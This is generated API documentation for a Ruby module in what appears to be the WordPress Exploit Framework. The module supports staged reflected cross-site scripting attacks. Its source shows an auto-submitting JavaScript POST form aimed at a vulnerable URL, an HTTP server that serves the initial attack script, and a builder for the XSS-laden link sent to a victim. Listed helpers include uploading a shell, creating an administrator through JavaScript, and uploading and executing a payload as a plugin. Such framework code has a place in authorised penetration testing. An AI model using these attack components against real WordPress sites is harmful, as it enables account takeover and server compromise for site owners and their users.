Module: Wpxf::WordPress::StagedReflectedXss

Includes:
ReflectedXss
Defined in:
lib/wpxf/wordpress/staged_reflected_xss.rb

Overview

Provides reusable functionality for reflected XSS modules.

Instance Method Summary

Methods included from Xss

#upload_shell, #wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script

Methods included from Plugin

#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute

Methods included from Net::HttpServer

#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #start_http_server, #stop_http_server

Instance Method Details

#create_basic_post_script(url, fields) ⇒ Object

Create a basic POST script with the specified fields. All values in the script will be wrapped in double quotes.

Parameters:

  • url (String)

    the vulnerable URL.

  • fields (Hash)

    the fields and values to inject into the script.

# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 52

def create_basic_post_script(url, fields)
  json = ''
  fields.each_with_index do |(k, v), i|
    if i < fields.size - 1
      json += "\"#{k}\": \"#{v}\",\n"
      next
    end

    json += "\"#{k}\": \"#{v}\"\n"
  end

  %|
    <html><head></head><body><script>
      #{js_post}
      post('#{url}', {
        #{json}
      });
    </script></body></html>
  |
end

#initial_req_path ⇒ String

Returns the path to use for the initial request.

Returns:

  • (String)

    the path to use for the initial request.

# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 21

def initial_req_path
  normalized_option_value('initial_req_path')
end

#initial_script ⇒ String

Returns the initial script that should be served to automate a form submission to the vulnerable page.

Returns:

  • (String)

    the initial script that should be served to automate a form submission to the vulnerable page.

# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 45

def initial_script
  nil
end

#initialize ⇒ Object

Initialize a new instance of Wpxf::WordPress::StagedReflectedXss.

# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 8

def initialize
  super
  register_option(
    StringOption.new(
      name: 'initial_req_path',
      desc: 'The path to be used to identify the initial request',
      required: true,
      default: Utility::Text.rand_alpha(rand(5..10))
    )
  )
end

#on_http_request(path, params, headers) ⇒ String

Invoked when an HTTP request is made to the server.

Parameters:

  • path (String)

    the path requested.

  • params (Hash)

    the query string parameters.

  • headers (Hash)

    the HTTP headers.

Returns:

  • (String)

    the response body to send to the client.

# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 30

def on_http_request(path, params, headers)
  if path.eql? normalize_uri(xss_path, initial_req_path)
    emit_info 'Initial request received...'
    { type: 'text/html', body: initial_script }
  else
    super
  end
end

#run ⇒ Boolean

Run the module.

Returns:

  • (Boolean)

    true if successful.

# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 75

def run
  if initial_script.nil?
    raise 'Required method "initial_script" has not been implemented'
  end

  super
end

#url_with_xss ⇒ String

Returns the URL to send the user to which contains the XSS vector.

Returns:

  • (String)

    the URL to send the user to which contains the XSS vector.

# File 'lib/wpxf/wordpress/staged_reflected_xss.rb', line 40

def url_with_xss
  normalize_uri(xss_url, initial_req_path)
end